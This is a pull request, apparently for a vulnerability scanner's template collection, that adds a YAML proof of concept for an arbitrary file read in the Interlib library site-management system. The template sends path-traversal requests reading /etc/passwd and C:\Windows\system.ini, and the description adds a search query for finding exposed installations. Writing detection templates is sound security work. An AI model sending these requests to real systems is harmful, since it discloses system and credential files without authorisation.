### PR TITLE
图创软件 图书馆站群管理系统 存在任意文件读取漏洞，攻击者通过漏洞可以读取任意文件

### DIFF
--- a/pocs/interlib-management-system-fileread.yml
+++ b/pocs/interlib-management-system-fileread.yml
@@ -2,7 +2,7 @@ name: poc-yaml-interlib-management-system-fileread
 groups:
   linux:
     - method: GET
-      path: /interlib/report/ShowImage?localPath=etc/passwd
+      path: /interlib/report/ShowImage?localPath=/etc/passwd
       expression: |
         response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
   windows:

--- a/pocs/interlib-management-system-fileread.yml
+++ b/pocs/interlib-management-system-fileread.yml
@@ -1,0 +1,16 @@
+name: poc-yaml-interlib-management-system-fileread
+groups:
+  linux:
+    - method: GET
+      path: /interlib/report/ShowImage?localPath=etc/passwd
+      expression: |
+        response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+  windows:
+    - method: GET
+      path: /interlib/report/ShowImage?localPath=C:\Windows\system.ini
+      expression: |
+        response.status == 200 && response.body.bcontains(b"for 16-bit app support")
+detail:
+  author: MaxSecurity(https://github.com/MaxSecurity)
+  links:
+    - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E7%AB%99%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
图书馆站群管理系统 存在任意文件读取漏洞
## 测试环境
"广州图创" && country="CN" && body="/interlib/common/"
## 备注
